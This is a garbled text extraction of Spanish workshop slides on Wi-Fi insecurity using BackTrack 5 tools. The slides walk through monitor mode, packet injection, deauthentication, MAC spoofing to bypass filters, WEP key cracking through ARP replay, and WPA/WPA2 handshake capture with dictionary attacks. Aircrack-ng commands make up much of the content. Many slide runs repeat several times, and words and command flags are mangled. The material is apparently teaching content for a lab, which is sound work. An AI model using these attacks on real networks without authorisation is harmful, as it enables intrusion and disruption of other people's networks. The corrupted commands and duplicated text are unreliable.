7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 22: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 23: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

